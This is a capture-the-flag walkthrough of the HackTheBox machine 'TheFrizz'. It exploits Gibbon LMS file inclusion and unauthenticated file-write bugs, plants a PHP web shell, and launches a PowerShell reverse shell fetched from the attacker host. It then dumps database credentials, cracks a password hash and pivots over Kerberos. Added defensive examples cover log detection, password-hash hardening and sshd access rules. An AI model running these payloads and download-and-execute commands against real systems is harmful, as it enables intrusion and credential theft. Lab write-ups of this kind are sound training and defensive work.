TheFrizz
Recon
HTTP (80)
frizz.htb redirects to frizzdc.frizz.htb, which is just a landing page website.

Gibbon LMS
/Gibbon-LMS/ serves a Staff Login panel.

LFI
Gibbon v25.0.0 is vulnerable to a Local File Inclusion - CVE-2023-34598
Test: http://frizzdc.frizz.htb/Gibbon-LMS/?q=gibbon.sql

Download files
from requests import Session
from bs4 import BeautifulSoup as BS
from pathlib import Path

SAVE = Path('LFI Exfiltrate')
URL = 'http://frizzdc.frizz.htb/Gibbon-LMS/'
SAVE.mkdir(exist_ok=True)

with Session() as session:
    while True:
        file = input('Filename: ')
        resp = session.get(URL, params={'q': file})
        # Gibbon prints this message when the included path does not exist
        if 'the Gibbons have escaped!' in resp.text:
            print("No such file")
            continue
        # the included file is rendered inside the #content div
        contents = BS(resp.text, 'html.parser').find('div', {'id': 'content'}).get_text(strip=True)
        # keep only the basename so a path like lib/x.php lands in SAVE, not in a subdirectory
        with open(SAVE / Path(file).name, 'w') as f:
            f.write(contents)
        print(f"Contents: {contents[:100]}")
└─$ sudo mysql -u root
CREATE DATABASE gibbon;
CREATE USER 'gibbon_user'@'localhost' IDENTIFIED BY 'gibbon_user';
GRANT ALL PRIVILEGES ON gibbon.* TO 'gibbon_user'@'localhost';
FLUSH PRIVILEGES;
USE gibbon;
SOURCE ./LFI Exfiltrate/gibbon.sql
Nothing useful in the database, except perhaps the username format used in the domain.

└─$ feroxbuster -u 'http://frizzdc.frizz.htb/Gibbon-LMS/?q=' -k -w /usr/share/seclists/Discovery/Web-Content/common.txt --thorough -n -D -C 404,403,400 -S 0,34
200 GET 674l 5642w 35113c http://frizzdc.frizz.htb/Gibbon-LMS/LICENSE
301 GET 9l 30w 361c http://frizzdc.frizz.htb/Gibbon-LMS/Resources => http://frizzdc.frizz.htb/Gibbon-LMS/Resources/
301 GET 9l 30w 358c http://frizzdc.frizz.htb/Gibbon-LMS/Themes => http://frizzdc.frizz.htb/Gibbon-LMS/Themes/
301 GET 9l 30w 361c http://frizzdc.frizz.htb/Gibbon-LMS/installer => http://frizzdc.frizz.htb/Gibbon-LMS/installer/
200 GET 363l 1014w 22064c http://frizzdc.frizz.htb/Gibbon-LMS/index.php
301 GET 9l 30w 355c http://frizzdc.frizz.htb/Gibbon-LMS/lib => http://frizzdc.frizz.htb/Gibbon-LMS/lib/
200 GET 674l 5642w 35113c http://frizzdc.frizz.htb/Gibbon-LMS/license
301 GET 9l 30w 359c http://frizzdc.frizz.htb/Gibbon-LMS/modules => http://frizzdc.frizz.htb/Gibbon-LMS/modules/
200 GET 7l 39w 374c http://frizzdc.frizz.htb/Gibbon-LMS/preferences.php
200 GET 9l 55w 524c http://frizzdc.frizz.htb/Gibbon-LMS/privacypolicy.php
301 GET 9l 30w 361c http://frizzdc.frizz.htb/Gibbon-LMS/resources => http://frizzdc.frizz.htb/Gibbon-LMS/resources/
200 GET 54l 171w 2617c http://frizzdc.frizz.htb/Gibbon-LMS/report.php
200 GET 4l 8w 54c http://frizzdc.frizz.htb/Gibbon-LMS/robots.txt
200 GET 7l 39w 380c http://frizzdc.frizz.htb/Gibbon-LMS/notifications.php
301 GET 9l 30w 355c http://frizzdc.frizz.htb/Gibbon-LMS/src => http://frizzdc.frizz.htb/Gibbon-LMS/src/
301 GET 9l 30w 358c http://frizzdc.frizz.htb/Gibbon-LMS/themes => http://frizzdc.frizz.htb/Gibbon-LMS/themes/
301 GET 9l 30w 359c http://frizzdc.frizz.htb/Gibbon-LMS/uploads => http://frizzdc.frizz.htb/Gibbon-LMS/uploads/
200 GET 1364l 2928w 25809c http://frizzdc.frizz.htb/Gibbon-LMS/themes/Default/css/main.css
200 GET 16l 57w 660c http://frizzdc.frizz.htb/Gibbon-LMS/update.php
301 GET 9l 30w 358c http://frizzdc.frizz.htb/Gibbon-LMS/vendor => http://frizzdc.frizz.htb/Gibbon-LMS/vendor/
200 GET 17l 192w 10137c http://frizzdc.frizz.htb/Gibbon-LMS/resources/assets/css/theme.min.css
200 GET 137l 1035w 85530c http://frizzdc.frizz.htb/Gibbon-LMS/themes/Default/img/logo.png
200 GET 17l 1449w 863561c http://frizzdc.frizz.htb/Gibbon-LMS/resources/assets/css/core.min.css
200 GET 53l 226w 2845c http://frizzdc.frizz.htb/Gibbon-LMS/error.php
We basically have read access to all files from the repository: https://github.com/GibbonEdu/core/tree/v25.0.00
.. is blocked, so the LFI cannot reach files outside the application directory.
https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=Gibbon
Arbitrary File Write
CVE-2023-45878: GibbonEdu Gibbon version 25.0.1 and before allows Arbitrary File Write because rubrics_visualise_saveAjax.phps does not require authentication. The endpoint accepts the img, path, and gibbonPersonID parameters. The img parameter is expected to be a base64 encoded image. If the path parameter is set, the defined path is used as the destination folder, concatenated with the absolute path of the installation directory. The content of the img parameter is base64 decoded and written to the defined file path. This allows creation of PHP files that permit Remote Code Execution (unauthenticated).
https://github.com/advisories/GHSA-r526-pvv3-w6p8 -> https://herolab.usd.de/security-advisories/usd-2023-0025/
File exists
└─$ curl http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php -i
HTTP/1.1 200 OK
Date: Sun, 16 Mar 2025 10:49:11 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Set-Cookie: G60fa1cd0af7be78b=82pclbkbt74720uk1r30avct0v; path=/; HttpOnly; SameSite=Lax
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Use PoC to upload a shell
└─$ echo -n '<?php echo system($_REQUEST[0]); ?>' | basenc --base64url
PD9waHAgZWNobyBzeXN0ZW0oJF9SRVFVRVNUWzBdKTsgPz4=
└─$ curl http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php -d 'img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9SRVFVRVNUWzBdKTsgPz4=&path=letmein.php&gibbonPersonID=0000000001'
letmein.php
Test uploaded shell
└─$ curl http://frizzdc.frizz.htb/Gibbon-LMS/letmein.php -d '0=whoami'
frizz\w.webservice
An HTB cleanup job deletes the web shell, so it's better to use it once to launch a reverse shell.
└─$ cp /opt/scripts/shells/ConPtyShell/Invoke-ConPtyShell.ps1 .
└─$ echo 'Invoke-ConPtyShell 10.10.14.18 4444;' >> Invoke-ConPtyShell.ps1
└─$ curl http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php -d "img=image/png;asdf,$(echo '<?php echo system($_REQUEST[0]); ?>' | basenc --base64url)&path=letmein.php&gibbonPersonID=0000000001"
└─$ curl http://frizzdc.frizz.htb/Gibbon-LMS/letmein.php --data-urlencode '0=powershell -c IEX(IWR 10.10.14.18/Invoke-ConPtyShell.ps1 -UseBasicParsing)'
Note: Make sure you have a listener and webserver up and running.
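As an added, defender-side example (not part of the writeup and not Gibbon's code): detection logic run over constructed Apache access-log lines for the two issues used above, the ?q= include (CVE-2023-34598) and the unauthenticated POST to rubrics_visualise_saveAjax.php (CVE-2023-45878), plus the tell-tale follow-up of a request to a PHP file that is not part of the application. The log lines are constructed; the allowlist of top-level scripts is taken from the feroxbuster results above, and the severity labels are my own.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

APP_ROOT = "/Gibbon-LMS/"
WRITE_ENDPOINT = APP_ROOT + "modules/Rubrics/rubrics_visualise_saveAjax.php"
# Top-level scripts Gibbon legitimately serves (from the feroxbuster output above).
KNOWN_TOP_LEVEL = {"index.php", "preferences.php", "privacypolicy.php", "report.php",
                   "notifications.php", "update.php", "error.php"}

# Constructed sample lines in Apache "combined" format; not captured from the box.
SAMPLE_LOG = """\
10.10.14.18 - - [16/Mar/2025:10:40:01 +0000] "GET /Gibbon-LMS/?q=gibbon.sql HTTP/1.1" 200 35113 "-" "python-requests/2.31"
10.10.14.18 - - [16/Mar/2025:10:41:12 +0000] "GET /Gibbon-LMS/?q=index.php HTTP/1.1" 200 22064 "-" "Mozilla/5.0"
10.10.14.18 - - [16/Mar/2025:10:49:11 +0000] "GET /Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php HTTP/1.1" 200 0 "-" "curl/8.5.0"
10.10.14.18 - - [16/Mar/2025:10:50:30 +0000] "POST /Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php HTTP/1.1" 200 11 "-" "curl/8.5.0"
10.10.14.18 - - [16/Mar/2025:10:51:02 +0000] "POST /Gibbon-LMS/letmein.php HTTP/1.1" 200 18 "-" "curl/8.5.0"
10.129.123.5 - - [16/Mar/2025:10:52:00 +0000] "GET /Gibbon-LMS/index.php HTTP/1.1" 200 22064 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_line(line):
    """Split one combined-format line into ip/method/path/query; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def detect(lines):
    """Return (severity, rule, ip, target) tuples for suspicious requests."""
    findings = []
    write_seen = defaultdict(bool)  # ip -> has POSTed to the file-write endpoint
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, path, query = rec["ip"], rec["method"], rec["path"], rec["query"]

        # Rule 1: q= is meant to name a module .php file; anything else (a .sql dump,
        # a traversal) is the CVE-2023-34598 include.
        for value in query.get("q", []):
            if not value.endswith(".php") or ".." in value:
                findings.append(("high", "lfi-include", ip, rec["target"]))

        # Rule 2: POST to the endpoint that writes files without authentication
        # (CVE-2023-45878). The body is not in the log, so flag it for review.
        if method == "POST" and path == WRITE_ENDPOINT:
            write_seen[ip] = True
            findings.append(("medium", "file-write-endpoint", ip, rec["target"]))

        # Rule 3: a .php file directly under the web root that the app does not ship;
        # after a file-write POST from the same client this is almost certainly a web shell.
        if path.startswith(APP_ROOT) and path.endswith(".php"):
            rel = path[len(APP_ROOT):]
            if "/" not in rel and rel not in KNOWN_TOP_LEVEL:
                severity = "critical" if write_seen[ip] else "high"
                findings.append((severity, "unknown-webroot-php", ip, rec["target"]))
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG.splitlines()):
        print(*finding)
```

Rule 2 fires on every POST to the endpoint because the log cannot show whether a Gibbon session cookie was present; on a patched install (after 25.0.1) those hits are benign, so the rule is a triage hint, while rule 3 following rule 2 from one client is the high-confidence signal.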
Reverse Shell (w.webservice)
└─$ stty raw -echo; (stty size; cat) | nc -lvnp 4444
listening on [any] 4444 ... connect to [10.10.14.18] from (UNKNOWN) [10.129.123.117] 65511
PS C:\xampp\htdocs\Gibbon-LMS> whoami /all
User Name SID
================== ==============================================
frizz\w.webservice S-1-5-21-2386970044-1145388522-2932701813-1120
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Get application config
PS C:\xampp\htdocs\Gibbon-LMS> cat .\config.php
...
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
...
Interestingly, access to /Users is denied, and the mysql binary doesn't seem to exist on the system.
PS C:\xampp\htdocs\Gibbon-LMS> ls /Users
ls : Access to the path 'C:\Users' is denied.
At line:1 char:1
+ ls /Users
+ ~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Users:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
Correction: mysql exists, but it's not in PATH.
PS C:\xampp> ls .\mysql\bin\mysql.exe
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/30/2023 5:58 AM 3784616 mysql.exe
PS C:\xampp> \xampp\mysql\bin\mysql.exe -u'MrGibbonsDB' -p'MisterGibbs!Parrot!?1' gibbon -e 'SHOW DATABASES;'
+--------------------+
| Database |
+--------------------+
| gibbon |
| information_schema |
| test |
+--------------------+
PS C:\xampp> \xampp\mysql\bin\mysql.exe -u'MrGibbonsDB' -p'MisterGibbs!Parrot!?1' gibbon -e 'SHOW TABLES;'
...
PS C:\xampp> \xampp\mysql\bin\mysql.exe -u'MrGibbonsDB' -p'MisterGibbs!Parrot!?1' gibbon -e 'SELECT username,passwordStrong,passwordStrongSalt FROM gibbonperson'
+-----------+------------------------------------------------------------------+------------------------+
| username | passwordStrong | passwordStrongSalt |
+-----------+------------------------------------------------------------------+------------------------+
| f.frizzle | 067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03 | /aACFhikmNopqrRTVz2489 |
+-----------+------------------------------------------------------------------+------------------------+
# Format = HASH:SALT
➜ cat .\hashes.txt
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489
➜ .\hashcat.exe --identify .\hashes.txt
# | Name | Category
======+============================================================+======================================
1410 | sha256($pass.$salt) | Raw Hash salted and/or iterated
1420 | sha256($salt.$pass) | Raw Hash salted and/or iterated
22300 | sha256($salt.$pass.$salt) | Raw Hash salted and/or iterated
20720 | sha256($salt.sha256($pass)) | Raw Hash salted and/or iterated
21420 | sha256($salt.sha256_bin($pass)) | Raw Hash salted and/or iterated
1440 | sha256($salt.utf16le($pass)) | Raw Hash salted and/or iterated
20710 | sha256(sha256($pass).$salt) | Raw Hash salted and/or iterated
1430 | sha256(utf16le($pass).$salt) | Raw Hash salted and/or iterated
1450 | HMAC-SHA256 (key = $pass) | Raw Hash authenticated
1460 | HMAC-SHA256 (key = $salt) | Raw Hash authenticated
11750 | HMAC-Streebog-256 (key = $pass), big-endian | Raw Hash authenticated
11760 | HMAC-Streebog-256 (key = $salt), big-endian | Raw Hash authenticated
➜ .\hashcat.exe -a 0 -m 1410 .\hashes.txt .\rockyou.txt
Failed...
➜ .\hashcat.exe -a 0 -m 1420 .\hashes.txt .\rockyou.txt
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489:Jenni_Luvs_Magic23
Creds:
f.frizzle:Jenni_Luvs_Magic23
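An added example, not from the writeup or from Gibbon itself: what hashcat mode 1420 actually checked, namely that passwordStrong is sha256(passwordStrongSalt . password), verified in Python against the row and the recovered password above, next to a PBKDF2 record that shows the hardening direction (a slow, salted KDF; the record format is my own, not Gibbon's) and a rough measurement of how many more guesses per second the single-hash scheme allows.

```python
import hashlib
import hmac
import os
import time
from typing import Optional

# Values from the gibbonperson row and the hashcat result above.
STORED_HASH = "067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03"
STORED_SALT = "/aACFhikmNopqrRTVz2489"


def gibbon_password_hash(password: str, salt: str) -> str:
    """Gibbon's passwordStrong scheme as hashcat mode 1420 models it: sha256(salt . password).
    One hash, no work factor, so a GPU tests billions of candidates per second."""
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


def verify_gibbon(password: str, salt: str, stored_hex: str) -> bool:
    return hmac.compare_digest(gibbon_password_hash(password, salt), stored_hex)


def pbkdf2_record(password: str, iterations: int = 600_000, salt: Optional[bytes] = None) -> str:
    """A slow, salted alternative written as 'pbkdf2_sha256$iterations$salt$hash'
    (illustrative format, not Gibbon's)."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(password: str, record: str) -> bool:
    algo, iters, salt_hex, dk_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


def slowdown_factor(iterations: int = 10_000, fast_samples: int = 5_000, slow_samples: int = 20) -> float:
    """Ratio of candidate passwords per second for sha256(salt.pass) versus PBKDF2 at
    `iterations` rounds, measured on this machine (a CPU-only, order-of-magnitude figure)."""
    salt = os.urandom(16)
    t0 = time.perf_counter()
    for i in range(fast_samples):
        gibbon_password_hash(f"candidate{i}", STORED_SALT)
    fast_rate = fast_samples / (time.perf_counter() - t0)
    t0 = time.perf_counter()
    for i in range(slow_samples):
        hashlib.pbkdf2_hmac("sha256", f"candidate{i}".encode("utf-8"), salt, iterations)
    slow_rate = slow_samples / (time.perf_counter() - t0)
    return fast_rate / slow_rate


if __name__ == "__main__":
    print("recovered password verifies:", verify_gibbon("Jenni_Luvs_Magic23", STORED_SALT, STORED_HASH))
    print(f"sha256(salt.pass) allows roughly {slowdown_factor():.0f}x more guesses/s than PBKDF2-10k")
```

Plain concatenation also has no delimiter between salt and password, so ("salt", "pw") and ("sal", "tpw") produce the same digest; the iteration count in the PBKDF2 record is what makes each guess expensive, and storing it beside the hash lets it be raised later without re-prompting users.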
HTTP (80) (Authenticated)
Credentials work for Gibbon, but there's nothing too interesting

Hmm... something about migrations

SMB
STATUS_NOT_SUPPORTED usually means Kerberos is required to authenticate to the DC.
└─$ netexec smb frizzdc.frizz.htb -u f.frizzle -p 'Jenni_Luvs_Magic23'
SMB 10.129.123.117 445 10.129.123.117 [*] x64 (name:10.129.123.117) (domain:10.129.123.117) (signing:True) (SMBv1:False)
SMB 10.129.123.117 445 10.129.123.117 [-] 10.129.123.117\f.frizzle:Jenni_Luvs_Magic23 STATUS_NOT_SUPPORTED
└─$ netexec smb frizzdc.frizz.htb -u f.frizzle -p 'Jenni_Luvs_Magic23' -k
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False)
SMB frizzdc.frizz.htb 445 frizzdc [-] frizz.htb\f.frizzle:Jenni_Luvs_Magic23 KRB_AP_ERR_SKEW
Fix clock skew and login
└─$ sudo ntpdate frizz.htb
2025-03-16 07:54:29.839372 (-0400) +25199.747085 +/- 0.035767 frizz.htb 10.129.123.117 s1 no-leap
CLOCK: time stepped by 25199.747085
└─$ echo $(( 25199.747085 / 3600 ))
6.9999297458333327
└─$ faketime -f +7h netexec smb frizzdc.frizz.htb -u f.frizzle -p 'Jenni_Luvs_Magic23' -k --shares
SMB frizzdc.frizz.htb 445 frizzdc [*] x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False)
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23
SMB frizzdc.frizz.htb 445 frizzdc [*] Enumerated shares
SMB frizzdc.frizz.htb 445 frizzdc Share Permissions Remark
SMB frizzdc.frizz.htb 445 frizzdc ----- ----------- ------
SMB frizzdc.frizz.htb 445 frizzdc ADMIN$ Remote Admin
SMB frizzdc.frizz.htb 445 frizzdc C$ Default share
SMB frizzdc.frizz.htb 445 frizzdc IPC$ READ Remote IPC
SMB frizzdc.frizz.htb 445 frizzdc NETLOGON READ Logon server share
SMB frizzdc.frizz.htb 445 frizzdc SYSVOL READ Logon server share
netexec winrm was failing to log in 🤔
└─$ faketime -f +7h netexec winrm frizzdc.frizz.htb -u f.frizzle -p 'Jenni_Luvs_Magic23' -k
[07:55:51] ERROR Exception while calling proto_flow() on target frizzdc.frizz.htb: ("Unpacked data doesn't match constant value 'b')\\xea\\xdbz\\xba,'' should be ''NTLMSSP\\x00''", 'When connection.py:176 unpacking field \' | "NTLMSSP\x00 | b\')\\xea\\xdbz\\xba,\'[:8]\'')
WinRM (f.frizzle)
Configure kerberos (configure_krb5.py)
└─$ /opt/scripts/utils/configure_krb5.py frizz.htb frizzdc
[*] This script must be run as root
[*] Configuration Data:
[libdefault]
default_realm = FRIZZ.HTB
[realms]
FRIZZ.HTB = {
kdc = frizzdc.frizz.htb
admin_server = frizzdc.frizz.htb
}
[domain_realm]
frizz.htb = FRIZZ.HTB
.frizz.htb = FRIZZ.HTB
[!] Above Configuration will overwrite /etc/krb5.conf, are you sure? [y/N] y
[+] /etc/krb5.conf has been configured
From the future: TIL NetExec > SMB protocol Enumeration > Generate krb5 conf file
└─$ faketime -f +7h impacket-getTGT -dc-ip 'frizzdc.frizz.htb' 'frizz.htb'/'f.frizzle':'Jenni_Luvs_Magic23' -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in f.frizzle.ccache
└─$ export KRB5CCNAME=$(readlink -f ./f.frizzle.ccache)
└─$ faketime -f +7h evil-winrm -i frizzdc.frizz.htb -r frizz.htb
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\f.frizzle\Documents> whoami /all
User Name SID
=============== ==============================================
frizz\f.frizzle S-1-5-21-2386970044-1145388522-2932701813-1103
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
From the future, about SSH: weird flex from Windows, I guess.
Works: faketime -f +7h ssh f.frizzle@frizzdc.frizz.htb
Doesn't work: faketime -f +7h ssh f.frizzle@frizz.htb (no DC hostname)

Another note about SSH: if you make yourself an admin, you can no longer SSH in... 😳 The sshd_config shows why:
*Evil-WinRM* PS C:\Users\M.SchoolBus\Documents> cat \ProgramData\ssh\sshd_config | sls -notmatch '#|^$'
LoginGraceTime 1m
PermitRootLogin no
StrictModes yes
MaxSessions 3
PubkeyAuthentication no
AuthorizedKeysFile .ssh/authorized_keys
HostbasedAuthentication no
IgnoreUserKnownHosts yes
IgnoreRhosts yes
PasswordAuthentication no
PermitEmptyPasswords no
GSSAPIAuthentication yes
AllowAgentForwarding no
AllowTcpForwarding no
PermitTTY yes
PrintMotd yes
ClientAliveInterval 120
ClientAliveCountMax 3
PermitTunnel no
Banner "This is a production server, not a field trip. Please be responsible. -Marvin"
Subsystem sftp sftp-server.exe
Subsystem powershell C:/progra~1/powershell/7/pwsh.exe -sshs
Match Group administrators
AuthorizedKeysFile __PROGRAMDATA__/ssh/administrators_authorized_keys
DenyGroups "Frizz/Administrators"
AllowGroups "Frizz/Remote Management Users"
AllowUsers Frizz/m.schoolbus Frizz/f.frizzle
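An added example (mine, not from the writeup) that evaluates the config above the way sshd's allowed_user() does: DenyUsers, then AllowUsers, then DenyGroups, then AllowGroups, with the first failing check deciding. It also models how Match scopes directives: a Match line opens a block that runs until the next Match line or end of file, so the DenyGroups/AllowGroups/AllowUsers lines here belong to "Match Group administrators" and apply only to members of that group. User and group names are constructed inputs in the "Domain/Name" form the config itself uses (an assumption about how the Windows port presents them), and the config text is trimmed to the relevant lines.

```python
import fnmatch
import shlex
from collections import defaultdict

# Relevant lines of the sshd_config captured above (other directives omitted).
SSHD_CONFIG = """\
PubkeyAuthentication no
PasswordAuthentication no
GSSAPIAuthentication yes
Match Group administrators
AuthorizedKeysFile __PROGRAMDATA__/ssh/administrators_authorized_keys
DenyGroups "Frizz/Administrators"
AllowGroups "Frizz/Remote Management Users"
AllowUsers Frizz/m.schoolbus Frizz/f.frizzle
"""


def parse_sshd_config(text):
    """Return [(criteria, directives)]; criteria is None for the global section.
    Every line after a Match line belongs to that block until the next Match line."""
    blocks = [(None, defaultdict(list))]
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, rest = line.partition(" ")
        values = shlex.split(rest)  # handles the quoted group names
        if key.lower() == "match":
            blocks.append((values, defaultdict(list)))
        else:
            blocks[-1][1][key.lower()].extend(values)
    return blocks


def _matches(name, patterns):
    # sshd patterns are globs; the Windows port compares names case-insensitively (assumption).
    return any(fnmatch.fnmatchcase(name.lower(), p.lower()) for p in patterns)


def _match_applies(criteria, user, groups):
    # Only the User and Group criteria are modelled; any other criterion is treated as not matching.
    for crit, pattern in zip(criteria[::2], criteria[1::2]):
        pats = pattern.split(",")
        if crit.lower() == "user" and not _matches(user, pats):
            return False
        if crit.lower() == "group" and not any(_matches(g, pats) for g in groups):
            return False
        if crit.lower() not in ("user", "group"):
            return False
    return True


def ssh_login_allowed(config_text, user, groups):
    """Apply sshd's allowed_user() order to the effective (global + matching Match blocks)
    config. Returns (allowed, reason)."""
    eff = defaultdict(list)
    for criteria, directives in parse_sshd_config(config_text):
        if criteria is None or _match_applies(criteria, user, groups):
            for key, values in directives.items():
                eff[key].extend(values)
    if eff["denyusers"] and _matches(user, eff["denyusers"]):
        return False, "DenyUsers"
    if eff["allowusers"] and not _matches(user, eff["allowusers"]):
        return False, "AllowUsers"
    if eff["denygroups"] and any(_matches(g, eff["denygroups"]) for g in groups):
        return False, "DenyGroups"
    if eff["allowgroups"] and not any(_matches(g, eff["allowgroups"]) for g in groups):
        return False, "AllowGroups"
    return True, "allowed"


if __name__ == "__main__":
    # Constructed group memberships for the two situations in the writeup.
    print(ssh_login_allowed(SSHD_CONFIG, "Frizz/f.frizzle", ["Frizz/Remote Management Users"]))
    print(ssh_login_allowed(SSHD_CONFIG, "Frizz/m.schoolbus",
                            ["administrators", "Frizz/Administrators", "Frizz/Remote Management Users"]))
```

Because the restrictions live inside the Match block, a non-admin account is governed only by the global settings; once the same account is also a local administrator the block applies and "DenyGroups Frizz/Administrators" wins regardless of AllowUsers, which is exactly the "became admin, lost SSH" effect. Note also that an administrator who is not in AllowUsers is refused at the AllowUsers step, before the group checks are reached.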
User.txt
*Evil-WinRM* PS C:\Users\f.frizzle> cat Desktop/user.txt
d85a04eb3d8b99b16c2b76df607701d8
WinRM (M.SchoolBus)
Enumerate with winpeas
*Evil-WinRM* PS C:\Users\f.frizzle\Music> curl.exe 10.10.14.18/wp.exe -O
*Evil-WinRM* PS C:\Users\f.frizzle\Music> .\wp.exe | tee -filepath wp.log
...
╔══════════╣ Scheduled Applications --Non Microsoft--
╚ Check if you can modify other users scheduled binaries https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.html
(frizz\administrator) Frizz-Cleanup: powershell -e c2V0LWNvbnRlbnQgLXZhbHVlICI5YTQyZGU2YzM0YjU0YWRjYjc0MWFiYmIyNzAwZGQ4MiIgLXBhdGggImM6XHVzZXJzXGYuZnJpenpsZVxkZXNrdG9wXHVzZXIudHh0Igokc2hlbGw9bmV3LW9iamVjdCAtY29tIHNoZWxsLmFwcGxpY2F0aW9uCiRiaW4gPSAkc2hlbGwubmFtZXNwYWNlKDB4YSkKaWYoKGAkYmluLml0ZW1zKCl8bWVhc3VyZSkuY291bnQgLWx0IDEpewokaXRlbSA9ICRzaGVsbC5uYW1lc3BhY2UoMCkucGFyc2VuYW1lKCJDOlx1c2Vyc1xmLmZyaXp6bGVcQXBwRGF0YVxMb2NhbFxUZW1wXE15TWlsZXNfQmV0YS56aXAiKQokaXRlbS5pbnZva2V2ZXJiKCJkZWxldGUiKQ==
Trigger: At system startup-After triggered, repeat every 00:05:00 indefinitely.
Recycle Bin
Cronjob (decoded):
set-content -value "9a42de6c34b54adcb741abbb2700dd82" -path "c:\users\f.frizzle\desktop\user.txt"
$shell=new-object -com shell.application
$bin = $shell.namespace(0xa)
if((`$bin.items()|measure).count -lt 1){
$item = $shell.namespace(0).parsename("C:\users\f.frizzle\AppData\Local\Temp\MyMiles_Beta.zip")
$item.invokeverb("delete")
The above file doesn't exist, and after waiting a few minutes it still doesn't appear, so there's no job that creates backups or anything similar.
Using the Shell.Application COM object, $shell.Namespace(0xA) refers to the Recycle Bin.
But there's something else in the Recycle Bin:
PS C:\users\f.frizzle\music> (New-Object -ComObject Shell.Application).Namespace(0xA).Items() | Format-Table Name, Path
Name Path
---- ----
